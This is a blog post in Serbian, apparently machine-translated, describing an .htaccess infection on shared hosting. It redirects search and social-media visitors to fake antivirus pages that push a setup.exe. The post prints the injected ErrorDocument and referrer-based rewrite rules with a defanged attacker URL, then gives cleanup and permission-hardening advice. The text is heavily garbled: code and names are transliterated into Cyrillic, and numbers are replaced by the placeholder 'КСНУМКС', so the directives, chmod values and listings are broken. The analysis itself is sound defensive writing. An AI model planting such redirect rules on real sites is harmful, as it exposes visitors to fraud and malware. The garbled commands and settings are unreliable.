Малваре / Вирус - хтаццесс "препис" и преусмеравање.

Нови облик вируса што ја не видим много зна, утичу на сајтове хостоване на непоуздане сервери где корисници рачуни / подрачуна могу "видети" једни друге. Конкретно, хостинг налози се све стави у фолдер "вхостс"Писање и право корисник директоријум су "вхостс" даје општу употребу ... продавца у већини ситуација. То је типичан веб сервери, који не користе ВХМ / цПанел.

Деловање вируса хтаццесс -. Хтаццесс Хацк.

Вирус утичу фајлове .хтаццесс Сајт жртве. И додао линије / Директива до преусмерите посетилаца (Долази из Иахоо, МСН, Гоогле, Фацебоок, иаиндек, Твиттер, МиСпаце, итд сајтова и портала са великим саобраћајем), на неким сајтовима који нуде "Антивирус"То је. лажни антивирусни, Који сам написао у уводу .

Овако .хтаццесс утичу: (не приступате УРЛ адресе садржаја у наредним редовима)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

РевритеЕнгине Он

РевритеЦонд% {} ХТТП_РЕФЕРЕР Иандек *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Одноклассники *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ВКонтакте *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} Рамблер *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Цев.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Википедиа.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Блоггер. * $ [НЦ, ИЛИ].
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Баиду.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Кк.цом *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * МиСпаце.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Твиттер *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Фацебоок.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Гоогле *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * уживо.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * АОЛ.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Бинг.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * МСН.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Амазон.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Ебаи *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * ЛинкедИн.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Флицкр.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ливејасмин *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Сосо.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ДоублеЦлицк *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Порнхуб *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Оркут.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ЛивеЈоурнал *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Вордпресс. * $. [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Иахоо *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * питати.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Екците *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР АлтаВиста *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * МСН.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Нетсцапе *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ХотБот *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Иди.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Инфосеек *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} Мама *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Аллтхевеб *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Лицос *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Тражи.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР МетаЦравлер *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Пошта.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Догпиле.. * $ [НЦ]

РевритеЦонд% ХТТП_УСЕР_АГЕНТ {} * Прозори *..
РевритеРуле *. [Р, Л]

РевритеЦонд% {} РЕКУЕСТ_ФИЛЕНАМЕ-ф!
РевритеЦонд% РЕКУЕСТ_ФИЛЕНАМЕ {}-Д!
РевритеЦонд% РЕКУЕСТ_ФИЛЕНАМЕ {} * ЈПГ $ | * гиф |.. ПНГ * $.!
РевритеЦонд% ХТТП_УСЕР_АГЕНТ {} * Прозори *..
РевритеРуле *. [Р, Л]

Они који користе ВордПресс ће наћи ове линије у фајлу .хтаццесс од публиц_хтмл. Осим тога, вирус креира идентичан хтаццесс у фасцикли. вп-цонтент.

*Постоје ситуације у којима се јавља уместо пеориавасцуларсургери.цом днс.тхесоулфоодцафе.цом или друге адресе.

Оно што чини овај вирус.

Када преусмерена, посетилац је поздравио широм отворених руку поруком:

Упозорење!
Рачунар садржи различите знаке вируса и злонамерних програма присуство. Ваш тренутни Захтева антивирусни систем провери!
Сигурносни систем ће извршити брзо и бесплатно скенирање вашег рачунара за вирусе и злонамерних програма.

КСНУМКС малвер

Без обзира на то што се притисне дугме, ми смо одвели на страну "Ми Цомпутер"Створена да имитирају дизајн КСП. То аутоматски почиње "скенирање" на крају које смо сазнали да "заражен".

КСНУМКС малвер

Након што кликнете на дугме ОК или Цанцел, она ће почети ДовнлоадДатотеке сетуп.еке. Ово сетуп.еке је лажни антивирусни утиче на систем. Можете инсталирати неке злонамерне да пропагира даље линкови вируса, а поред њих анти-вирус софтвер (Све нетачно) да је жртва се позива да купи.
Они који су већ контактирали вирус може користити ову форму . Такође се препоручује да скенира цео хард диск. Препоручити Касперски Анти-Вирус или Касперски Анти-Вирус.

Овај тип вируса утиче Виситор ОС оперативни системи Виндовс КСП, Виндовс МЕ, Виндовс КСНУМКС, Виндовс НТ, Виндовс КСНУМКС и Виндовс КСНУМКС. За сада не постоје познати случајеви инфекције оперативног система Виндовс Виста и Виндовс КСНУМКС.

Како да уклоните овај вирус. Хтаццесс фајл на серверу, и како да се спречи инфекција.

1. Анализирајте сумњивих фајлова и брисање кодова. Да би се обезбедило да се датотека не утиче само .хтаццесс је бољи анализирате све датотеке .пхп si Јс..

КСНУМКС. Корекција датотеку. Хтаццесс и ја поставити цхмод КСНУМКС или КСНУМКС са само приступ писања упутство за власника.

КСНУМКС. Када креирате хостинг налог за сајт у фолдеру / дом или / Веброот То ће аутоматски креирали фасциклу која је често име корисника (упутство за цПанел, фтп, Итд). Да бисте спречили упис података и преношења вируса са једног корисника на другог, препоручује се да сваки корисник фолдер да се постави:

цхмод или КСНУМКС КСНУМКС, КСНУМКС - приказан је КСНУМКС.
цховн-Р нуме_усер нуме_фолдер.
ЦХГРП-Р нуме_усер нуме_фолдер

лс-све начина да проверите да ли су прописно успостављене. Уколико се појави нешто овако:

дрвк-к-к КСНУМКС Динамика Динамика мај КСНУМКС КСНУМКС КСНУМКС: КСНУМКС Динамика /
дрвк-к-к КСНУМКС Дуран Дуран март КСНУМКС КСНУМКС КСНУМКС: КСНУМКС Дуран /
дрвк-к-к КСНУМКС КСНУМКС Јан КСНУМКС КСНУМКС цеви цеви: КСНУМКС цеви /
дрвкр-кр-к КСНУМКС КСНУМКС фебруар КСНУМКС КСНУМКС Екпресс Екпресс Екпресс /
дрвкр-кр-к КСНУМКС ЕЗО ЕЗО мај КСНУМКС КСНУМКС КСНУМКС: КСНУМКС ЕЗО /
дрвк-к-к пхарма пхарма КСНУМКС КСНУМКС децембар КСНУМКС КСНУМКС: КСНУМКС пхарма /

Ако један од горе ће бити усереле ФТП Заражене датотекеТо не може да пошаље вирус на другог корисника домаћина. То је минимална сигурносна мрежа за заштиту налоге хостоване на веб серверу.

Заједнички елементи подручјима погођеним овом врстом вируса.

Сва подручја погођена преусмерава посетиоце на сајтове по домена који садрже "/".

Ова "вирус. хтаццесс"Утиче на било коју врсту ЦМС (Јоомла, ВордПресс, пхпББИтд) који користи .хтаццесс.

Хтаццесс. Пијук Преусмеравање Вирус &.

Малваре / Вирус - хтаццесс "препис" и преусмеравање.

О аутору

стеалтх ЦД

Оснивач и уредник Стеалтх НастројкиУ КСНУМКС датума.
Искуство на Линук оперативним системима (поготово Убунту), Мац ОС Кс, Виндовс КСП> Виндовс КСНУМКС и ВордПресс (ЦМС).

Оставите коментар

Ова страница користи Акисмет како би смањила нежељену пошту. Сазнајте како се ваш коментар обрађује.